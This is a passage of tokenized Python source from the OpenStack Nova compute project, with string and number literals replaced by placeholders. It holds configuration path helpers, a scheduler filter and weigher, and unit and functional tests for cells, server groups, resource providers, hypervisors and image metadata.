<EOL> return cls ( requests = objs , instance_uuid = pci_requests [ '<STR_LIT>' ] ) </s>
<s> import os <EOL> import sys <EOL> from oslo_config import cfg <EOL> path_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' ) ) , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = os . path . join ( sys . prefix , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> help = '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) , <EOL> ] <EOL> CONF = cfg . CONF <EOL> CONF . register_opts ( path_opts ) <EOL> def basedir_def ( * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( '<STR_LIT>' , * args ) <EOL> def bindir_def ( * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( '<STR_LIT>' , * args ) <EOL> def state_path_def ( * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( '<STR_LIT>' , * args ) <EOL> def basedir_rel ( * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( CONF . pybasedir , * args ) <EOL> def bindir_rel ( * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( CONF . bindir , * args ) <EOL> def state_path_rel ( * args ) : <EOL> """<STR_LIT>""" <EOL> return os . path . join ( CONF . state_path , * args ) </s>
<s> from oslo_log import log as logging <EOL> from nova . i18n import _LW <EOL> from nova . scheduler import filters <EOL> from nova import servicegroup <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class ComputeFilter ( filters . BaseHostFilter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . servicegroup_api = servicegroup . API ( ) <EOL> run_filter_once_per_request = True <EOL> def host_passes ( self , host_state , spec_obj ) : <EOL> """<STR_LIT>""" <EOL> service = host_state . service <EOL> if service [ '<STR_LIT>' ] : <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { '<STR_LIT>' : host_state , <EOL> '<STR_LIT>' : service . get ( '<STR_LIT>' ) } ) <EOL> return False <EOL> else : <EOL> if not self . servicegroup_api . service_is_up ( service ) : <EOL> LOG . warning ( _LW ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , { '<STR_LIT>' : host_state } ) <EOL> return False <EOL> return True </s>
<s> """<STR_LIT>""" <EOL> import nova . conf <EOL> from nova . scheduler import weights <EOL> CONF = nova . conf . CONF <EOL> class IoOpsWeigher ( weights . BaseHostWeigher ) : <EOL> minval = <NUM_LIT:0> <EOL> def weight_multiplier ( self ) : <EOL> """<STR_LIT>""" <EOL> return CONF . io_ops_weight_multiplier <EOL> def _weigh_object ( self , host_state , weight_properties ) : <EOL> """<STR_LIT>""" <EOL> return host_state . num_io_ops </s>
<s> from six . moves import range <EOL> from nova . cells import state <EOL> import nova . conf <EOL> from nova . db . sqlalchemy import models <EOL> from nova import exception <EOL> from nova . tests . functional . api_sample_tests import api_sample_base <EOL> CONF = nova . conf . CONF <EOL> CONF . import_opt ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> class CellsSampleJsonTest ( api_sample_base . ApiSampleTestBaseV21 ) : <EOL> extension_name = "<STR_LIT>" <EOL> def _get_flags ( self ) : <EOL> f = super ( CellsSampleJsonTest , self ) . _get_flags ( ) <EOL> f [ '<STR_LIT>' ] = CONF . osapi_compute_extension [ : ] <EOL> f [ '<STR_LIT>' ] . append ( <EOL> '<STR_LIT>' ) <EOL> f [ '<STR_LIT>' ] . append ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return f <EOL> def setUp ( self ) : <EOL> self . flags ( enable = True , db_check_interval = - <NUM_LIT:1> , group = '<STR_LIT>' ) <EOL> super ( CellsSampleJsonTest , self ) . setUp ( ) <EOL> self . cells = self . start_service ( '<STR_LIT>' , manager = CONF . cells . manager ) <EOL> self . _stub_cells ( ) <EOL> def _stub_cells ( self , num_cells = <NUM_LIT:5> ) : <EOL> self . cell_list = [ ] <EOL> self . cells_next_id = <NUM_LIT:1> <EOL> def _fake_cell_get_all ( context ) : <EOL> return self . cell_list <EOL> def _fake_cell_get ( inst , context , cell_name ) : <EOL> for cell in self . cell_list : <EOL> if cell [ '<STR_LIT:name>' ] == cell_name : <EOL> return cell <EOL> raise exception . CellNotFound ( cell_name = cell_name ) <EOL> for x in range ( num_cells ) : <EOL> cell = models . Cell ( ) <EOL> our_id = self . cells_next_id <EOL> self . cells_next_id += <NUM_LIT:1> <EOL> cell . update ( { '<STR_LIT:id>' : our_id , <EOL> '<STR_LIT:name>' : '<STR_LIT>' % our_id , <EOL> '<STR_LIT>' : '<STR_LIT>' % our_id , <EOL> '<STR_LIT>' : our_id % <NUM_LIT:2> == <NUM_LIT:0> } ) <EOL> self . cell_list . append ( cell ) <EOL> self . stub_out ( '<STR_LIT>' , _fake_cell_get_all ) <EOL> self . stub_out ( '<STR_LIT>' , _fake_cell_get ) <EOL> def test_cells_empty_list ( self ) : <EOL> self . _stub_cells ( num_cells = <NUM_LIT:0> ) <EOL> response = self . _do_get ( '<STR_LIT>' ) <EOL> self . _verify_response ( '<STR_LIT>' , { } , response , <NUM_LIT:200> ) <EOL> def test_cells_list ( self ) : <EOL> response = self . _do_get ( '<STR_LIT>' ) <EOL> self . _verify_response ( '<STR_LIT>' , { } , response , <NUM_LIT:200> ) <EOL> def test_cells_get ( self ) : <EOL> response = self . _do_get ( '<STR_LIT>' ) <EOL> self . _verify_response ( '<STR_LIT>' , { } , response , <NUM_LIT:200> ) <EOL> def test_get_cell_capacity ( self ) : <EOL> self . _mock_cell_capacity ( ) <EOL> state_manager = state . CellStateManager ( ) <EOL> my_state = state_manager . get_my_state ( ) <EOL> response = self . _do_get ( '<STR_LIT>' % <EOL> my_state . name ) <EOL> return self . _verify_response ( '<STR_LIT>' , <EOL> { } , response , <NUM_LIT:200> ) <EOL> def test_get_all_cells_capacity ( self ) : <EOL> self . _mock_cell_capacity ( ) <EOL> response = self . _do_get ( '<STR_LIT>' ) <EOL> return self . _verify_response ( '<STR_LIT>' , <EOL> { } , response , <NUM_LIT:200> ) <EOL> def _mock_cell_capacity ( self ) : <EOL> self . mox . StubOutWithMock ( self . cells . manager . state_manager , <EOL> '<STR_LIT>' ) <EOL> response = { "<STR_LIT>" : <EOL> { "<STR_LIT>" : { "<STR_LIT>" : <NUM_LIT:0> , "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : <NUM_LIT:3> , "<STR_LIT>" : <NUM_LIT:0> } , <EOL> "<STR_LIT>" : <NUM_LIT> } , <EOL> "<STR_LIT>" : <EOL> { "<STR_LIT>" : { "<STR_LIT>" : <NUM_LIT:11> , "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : <NUM_LIT:5> , "<STR_LIT:0>" : <NUM_LIT:0> } , <EOL> "<STR_LIT>" : <NUM_LIT> } <EOL> } <EOL> self . cells . manager . state_manager . get_our_capacities ( ) . AndReturn ( response ) <EOL> self . mox . ReplayAll ( ) </s>
<s> from oslo_config import cfg <EOL> from nova . compute import vm_states <EOL> from nova . tests . functional . api_sample_tests import test_servers <EOL> CONF = cfg . CONF <EOL> CONF . import_opt ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> CONF . import_opt ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> class ServersSampleHideAddressesJsonTest ( test_servers . ServersSampleJsonTest ) : <EOL> extension_name = '<STR_LIT>' <EOL> sample_dir = extension_name <EOL> def _get_flags ( self ) : <EOL> f = super ( ServersSampleHideAddressesJsonTest , self ) . _get_flags ( ) <EOL> f [ '<STR_LIT>' ] . append ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return f <EOL> def setUp ( self ) : <EOL> CONF . set_override ( "<STR_LIT>" , <EOL> [ vm_states . ACTIVE ] ) <EOL> super ( ServersSampleHideAddressesJsonTest , self ) . setUp ( ) </s>
<s> from oslo_config import cfg <EOL> from nova . tests . functional . api_sample_tests import api_sample_base <EOL> CONF = cfg . CONF <EOL> CONF . import_opt ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> class ServerGroupsSampleJsonTest ( api_sample_base . ApiSampleTestBaseV21 ) : <EOL> extension_name = "<STR_LIT>" <EOL> def _get_flags ( self ) : <EOL> f = super ( ServerGroupsSampleJsonTest , self ) . _get_flags ( ) <EOL> f [ '<STR_LIT>' ] = CONF . osapi_compute_extension [ : ] <EOL> f [ '<STR_LIT>' ] . append ( <EOL> '<STR_LIT>' ) <EOL> return f <EOL> def _get_create_subs ( self ) : <EOL> return { '<STR_LIT:name>' : '<STR_LIT:test>' } <EOL> def _post_server_group ( self ) : <EOL> """<STR_LIT>""" <EOL> subs = self . _get_create_subs ( ) <EOL> response = self . _do_post ( '<STR_LIT>' , <EOL> '<STR_LIT>' , subs ) <EOL> subs = { } <EOL> subs [ '<STR_LIT:name>' ] = '<STR_LIT:test>' <EOL> return self . _verify_response ( '<STR_LIT>' , <EOL> subs , response , <NUM_LIT:200> ) <EOL> def _create_server_group ( self ) : <EOL> subs = self . _get_create_subs ( ) <EOL> return self . _do_post ( '<STR_LIT>' , <EOL> '<STR_LIT>' , subs ) <EOL> def test_server_groups_post ( self ) : <EOL> return self . _post_server_group ( ) <EOL> def test_server_groups_list ( self ) : <EOL> subs = self . _get_create_subs ( ) <EOL> uuid = self . _post_server_group ( ) <EOL> response = self . _do_get ( '<STR_LIT>' ) <EOL> subs [ '<STR_LIT:id>' ] = uuid <EOL> self . _verify_response ( '<STR_LIT>' , <EOL> subs , response , <NUM_LIT:200> ) <EOL> def test_server_groups_get ( self ) : <EOL> subs = { '<STR_LIT:name>' : '<STR_LIT:test>' } <EOL> uuid = self . _post_server_group ( ) <EOL> subs [ '<STR_LIT:id>' ] = uuid <EOL> response = self . _do_get ( '<STR_LIT>' % uuid ) <EOL> self . _verify_response ( '<STR_LIT>' , subs , response , <NUM_LIT:200> ) <EOL> def test_server_groups_delete ( self ) : <EOL> uuid = self . _post_server_group ( ) <EOL> response = self . _do_delete ( '<STR_LIT>' % uuid ) <EOL> self . assertEqual ( <NUM_LIT> , response . status_code ) <EOL> class ServerGroupsV213SampleJsonTest ( ServerGroupsSampleJsonTest ) : <EOL> scenarios = [ <EOL> ( "<STR_LIT>" , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ] <EOL> def setUp ( self ) : <EOL> super ( ServerGroupsV213SampleJsonTest , self ) . setUp ( ) <EOL> self . api . microversion = self . microversion </s>
<s> from nova import context <EOL> from nova import exception <EOL> from nova import objects <EOL> from nova . objects import fields <EOL> from nova import test <EOL> from nova . tests import fixtures <EOL> from nova . tests import uuidsentinel <EOL> DISK_INVENTORY = dict ( <EOL> total = <NUM_LIT:200> , <EOL> reserved = <NUM_LIT:10> , <EOL> min_unit = <NUM_LIT:2> , <EOL> max_unit = <NUM_LIT:5> , <EOL> step_size = <NUM_LIT:1> , <EOL> allocation_ratio = <NUM_LIT:1.0> <EOL> ) <EOL> class ResourceProviderTestCase ( test . NoDBTestCase ) : <EOL> """<STR_LIT>""" <EOL> USES_DB_SELF = True <EOL> def setUp ( self ) : <EOL> super ( ResourceProviderTestCase , self ) . setUp ( ) <EOL> self . useFixture ( fixtures . Database ( ) ) <EOL> self . context = context . RequestContext ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_create_resource_provider_requires_uuid ( self ) : <EOL> resource_provider = objects . ResourceProvider ( <EOL> context = self . context ) <EOL> self . assertRaises ( exception . ObjectActionError , <EOL> resource_provider . create ) <EOL> def test_create_resource_provider ( self ) : <EOL> created_resource_provider = objects . ResourceProvider ( <EOL> context = self . context , <EOL> uuid = uuidsentinel . fake_resource_provider <EOL> ) <EOL> created_resource_provider . create ( ) <EOL> self . assertIsInstance ( created_resource_provider . id , int ) <EOL> retrieved_resource_provider = objects . ResourceProvider . get_by_uuid ( <EOL> self . context , <EOL> uuidsentinel . fake_resource_provider <EOL> ) <EOL> self . assertEqual ( retrieved_resource_provider . id , <EOL> created_resource_provider . id ) <EOL> def test_create_inventory_with_uncreated_provider ( self ) : <EOL> resource_provider = objects . ResourceProvider ( <EOL> context = self . context , <EOL> uuid = uuidsentinel . inventory_resource_provider <EOL> ) <EOL> resource_class = fields . ResourceClass . DISK_GB <EOL> disk_inventory = objects . Inventory ( <EOL> context = self . context , <EOL> resource_provider = resource_provider , <EOL> resource_class = resource_class , <EOL> ** DISK_INVENTORY <EOL> ) <EOL> self . assertRaises ( exception . ObjectActionError , <EOL> disk_inventory . create ) <EOL> def test_create_and_update_inventory ( self ) : <EOL> resource_provider = objects . ResourceProvider ( <EOL> context = self . context , <EOL> uuid = uuidsentinel . inventory_resource_provider <EOL> ) <EOL> resource_provider . create ( ) <EOL> resource_class = fields . ResourceClass . DISK_GB <EOL> disk_inventory = objects . Inventory ( <EOL> context = self . context , <EOL> resource_provider = resource_provider , <EOL> resource_class = resource_class , <EOL> ** DISK_INVENTORY <EOL> ) <EOL> disk_inventory . create ( ) <EOL> self . assertEqual ( resource_class , disk_inventory . resource_class ) <EOL> self . assertEqual ( resource_provider , <EOL> disk_inventory . resource_provider ) <EOL> self . assertEqual ( DISK_INVENTORY [ '<STR_LIT>' ] , <EOL> disk_inventory . allocation_ratio ) <EOL> self . assertEqual ( DISK_INVENTORY [ '<STR_LIT>' ] , <EOL> disk_inventory . total ) <EOL> disk_inventory . total = <NUM_LIT:32> <EOL> disk_inventory . save ( ) <EOL> inventories = objects . InventoryList . get_all_by_resource_provider_uuid ( <EOL> self . context , resource_provider . uuid ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( inventories ) ) <EOL> self . assertEqual ( <NUM_LIT:32> , inventories [ <NUM_LIT:0> ] . total ) <EOL> inventories [ <NUM_LIT:0> ] . total = <NUM_LIT> <EOL> inventories [ <NUM_LIT:0> ] . save ( ) <EOL> reloaded_inventories = ( <EOL> objects . InventoryList . get_all_by_resource_provider_uuid ( <EOL> self . context , resource_provider . uuid ) ) <EOL> self . assertEqual ( <NUM_LIT> , reloaded_inventories [ <NUM_LIT:0> ] . total ) </s>
<s> import copy <EOL> import mock <EOL> from nova . api . openstack . compute import hypervisors as hypervisors_v21 <EOL> from nova . api . openstack . compute . legacy_v2 . contrib import hypervisors as hypervisors_v2 <EOL> from nova . api . openstack import extensions <EOL> from nova import exception <EOL> from nova import objects <EOL> from nova import test <EOL> from nova . tests . unit . api . openstack . compute import test_hypervisors <EOL> from nova . tests . unit . api . openstack import fakes <EOL> def fake_compute_node_get ( context , compute_id ) : <EOL> for hyper in test_hypervisors . TEST_HYPERS_OBJ : <EOL> if hyper . id == int ( compute_id ) : <EOL> return hyper <EOL> raise exception . ComputeHostNotFound ( host = compute_id ) <EOL> def fake_compute_node_get_all ( context ) : <EOL> return test_hypervisors . TEST_HYPERS_OBJ <EOL> @ classmethod <EOL> def fake_service_get_by_compute_host ( cls , context , host ) : <EOL> for service in test_hypervisors . TEST_SERVICES : <EOL> if service . host == host : <EOL> return service <EOL> class ExtendedHypervisorsTestV21 ( test . NoDBTestCase ) : <EOL> DETAIL_HYPERS_DICTS = copy . deepcopy ( test_hypervisors . TEST_HYPERS ) <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] [ '<STR_LIT:host>' ] <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:1> ] [ '<STR_LIT:host>' ] <EOL> DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] . update ( { '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : dict ( id = <NUM_LIT:1> , host = '<STR_LIT>' , <EOL> disabled_reason = None ) } ) <EOL> DETAIL_HYPERS_DICTS [ <NUM_LIT:1> ] . update ( { '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : dict ( id = <NUM_LIT:2> , host = '<STR_LIT>' , <EOL> disabled_reason = None ) } ) <EOL> def _set_up_controller ( self ) : <EOL> self . controller = hypervisors_v21 . HypervisorsController ( ) <EOL> self . controller . servicegroup_api . service_is_up = mock . MagicMock ( <EOL> return_value = True ) <EOL> def _get_request ( self ) : <EOL> return fakes . HTTPRequest . blank ( '<STR_LIT>' , <EOL> use_admin_context = True ) <EOL> def setUp ( self ) : <EOL> super ( ExtendedHypervisorsTestV21 , self ) . setUp ( ) <EOL> self . _set_up_controller ( ) <EOL> self . stubs . Set ( self . controller . host_api , '<STR_LIT>' , <EOL> fake_compute_node_get_all ) <EOL> self . stubs . Set ( self . controller . host_api , '<STR_LIT>' , <EOL> fake_compute_node_get ) <EOL> self . stubs . Set ( objects . Service , '<STR_LIT>' , <EOL> fake_service_get_by_compute_host ) <EOL> def test_view_hypervisor_detail_noservers ( self ) : <EOL> result = self . controller . _view_hypervisor ( <EOL> test_hypervisors . TEST_HYPERS_OBJ [ <NUM_LIT:0> ] , <EOL> test_hypervisors . TEST_SERVICES [ <NUM_LIT:0> ] , True ) <EOL> self . assertEqual ( result , self . DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] ) <EOL> def test_detail ( self ) : <EOL> req = self . _get_request ( ) <EOL> result = self . controller . detail ( req ) <EOL> self . assertEqual ( result , dict ( hypervisors = self . DETAIL_HYPERS_DICTS ) ) <EOL> def test_show_withid ( self ) : <EOL> req = self . _get_request ( ) <EOL> result = self . controller . show ( req , '<STR_LIT:1>' ) <EOL> self . assertEqual ( result , dict ( hypervisor = self . DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] ) ) <EOL> class ExtendedHypervisorsTestV2 ( ExtendedHypervisorsTestV21 ) : <EOL> DETAIL_HYPERS_DICTS = copy . deepcopy ( test_hypervisors . TEST_HYPERS ) <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] [ '<STR_LIT:host>' ] <EOL> del DETAIL_HYPERS_DICTS [ <NUM_LIT:1> ] [ '<STR_LIT:host>' ] <EOL> DETAIL_HYPERS_DICTS [ <NUM_LIT:0> ] . update ( { '<STR_LIT>' : dict ( id = <NUM_LIT:1> , host = '<STR_LIT>' ) } ) <EOL> DETAIL_HYPERS_DICTS [ <NUM_LIT:1> ] . update ( { '<STR_LIT>' : dict ( id = <NUM_LIT:2> , host = '<STR_LIT>' ) } ) <EOL> def _set_up_controller ( self ) : <EOL> self . ext_mgr = extensions . ExtensionManager ( ) <EOL> self . ext_mgr . extensions = { } <EOL> self . ext_mgr . extensions [ '<STR_LIT>' ] = True <EOL> self . controller = hypervisors_v2 . HypervisorsController ( self . ext_mgr ) </s>
<s> import copy <EOL> import mock <EOL> from oslo_serialization import jsonutils <EOL> import webob <EOL> from nova . api . openstack . compute import image_metadata as image_metadata_v21 <EOL> from nova . api . openstack . compute . legacy_v2 import image_metadata <EOL> from nova import exception <EOL> from nova import test <EOL> from nova . tests . unit . api . openstack import fakes <EOL> from nova . tests . unit import image_fixtures <EOL> IMAGE_FIXTURES = image_fixtures . get_image_fixtures ( ) <EOL> CHK_QUOTA_STR = '<STR_LIT>' <EOL> def get_image_123 ( ) : <EOL> return copy . deepcopy ( IMAGE_FIXTURES ) [ <NUM_LIT:0> ] <EOL> class ImageMetaDataTestV21 ( test . NoDBTestCase ) : <EOL> controller_class = image_metadata_v21 . ImageMetadataController <EOL> invalid_request = exception . ValidationError <EOL> def setUp ( self ) : <EOL> super ( ImageMetaDataTestV21 , self ) . setUp ( ) <EOL> self . controller = self . controller_class ( ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_index ( self , get_all_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> res_dict = self . controller . index ( req , '<STR_LIT>' ) <EOL> expected = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assertEqual ( res_dict , expected ) <EOL> get_all_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_show ( self , get_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> res_dict = self . controller . show ( req , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , res_dict ) <EOL> self . assertEqual ( len ( res_dict [ '<STR_LIT>' ] ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( '<STR_LIT>' , res_dict [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> get_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_show_not_found ( self , _get_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> self . assertRaises ( webob . exc . HTTPNotFound , <EOL> self . controller . show , req , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotFound ( image_id = '<STR_LIT:100>' ) ) <EOL> def test_show_image_not_found ( self , _get_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> self . assertRaises ( webob . exc . HTTPNotFound , <EOL> self . controller . show , req , '<STR_LIT:100>' , '<STR_LIT>' ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_create ( self , get_mocked , update_mocked , quota_mocked ) : <EOL> mock_result = copy . deepcopy ( get_image_123 ( ) ) <EOL> mock_result [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> update_mocked . return_value = mock_result <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT:POST>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> res = self . controller . create ( req , '<STR_LIT>' , body = body ) <EOL> get_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' ) <EOL> expected = copy . deepcopy ( get_image_123 ( ) ) <EOL> expected [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> quota_mocked . assert_called_once_with ( mock . ANY , expected [ "<STR_LIT>" ] ) <EOL> update_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' , expected , <EOL> data = None , purge_props = True ) <EOL> expected_output = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assertEqual ( expected_output , res ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotFound ( image_id = '<STR_LIT:100>' ) ) <EOL> def test_create_image_not_found ( self , _get_mocked , update_mocked , <EOL> quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT:POST>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPNotFound , <EOL> self . controller . create , req , '<STR_LIT:100>' , body = body ) <EOL> self . assertFalse ( quota_mocked . called ) <EOL> self . assertFalse ( update_mocked . called ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_update_all ( self , get_mocked , update_mocked , quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> res = self . controller . update_all ( req , '<STR_LIT>' , body = body ) <EOL> get_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' ) <EOL> expected = copy . deepcopy ( get_image_123 ( ) ) <EOL> expected [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> quota_mocked . assert_called_once_with ( mock . ANY , expected [ "<STR_LIT>" ] ) <EOL> update_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' , expected , <EOL> data = None , purge_props = True ) <EOL> expected_output = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assertEqual ( expected_output , res ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotFound ( image_id = '<STR_LIT:100>' ) ) <EOL> def test_update_all_image_not_found ( self , _get_mocked , quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPNotFound , <EOL> self . controller . update_all , req , '<STR_LIT:100>' , body = body ) <EOL> self . assertFalse ( quota_mocked . called ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_update_item ( self , _get_mocked , update_mocked , quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> res = self . controller . update ( req , '<STR_LIT>' , '<STR_LIT>' , body = body ) <EOL> expected = copy . deepcopy ( get_image_123 ( ) ) <EOL> expected [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> quota_mocked . assert_called_once_with ( mock . ANY , expected [ "<STR_LIT>" ] ) <EOL> update_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' , expected , <EOL> data = None , purge_props = True ) <EOL> expected_output = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> self . assertEqual ( res , expected_output ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotFound ( image_id = '<STR_LIT:100>' ) ) <EOL> def test_update_item_image_not_found ( self , _get_mocked , quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPNotFound , <EOL> self . controller . update , req , '<STR_LIT:100>' , '<STR_LIT>' , <EOL> body = body ) <EOL> self . assertFalse ( quota_mocked . called ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_item_bad_body ( self , get_mocked , update_mocked , <EOL> quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : "<STR_LIT>" } <EOL> req . body = b'<STR_LIT>' <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( self . invalid_request , <EOL> self . controller . update , req , '<STR_LIT>' , '<STR_LIT>' , <EOL> body = body ) <EOL> self . assertFalse ( get_mocked . called ) <EOL> self . assertFalse ( quota_mocked . called ) <EOL> self . assertFalse ( update_mocked . called ) <EOL> @ mock . patch ( CHK_QUOTA_STR , <EOL> side_effect = webob . exc . HTTPBadRequest ( ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_item_too_many_keys ( self , get_mocked , update_mocked , <EOL> _quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT:foo>" : 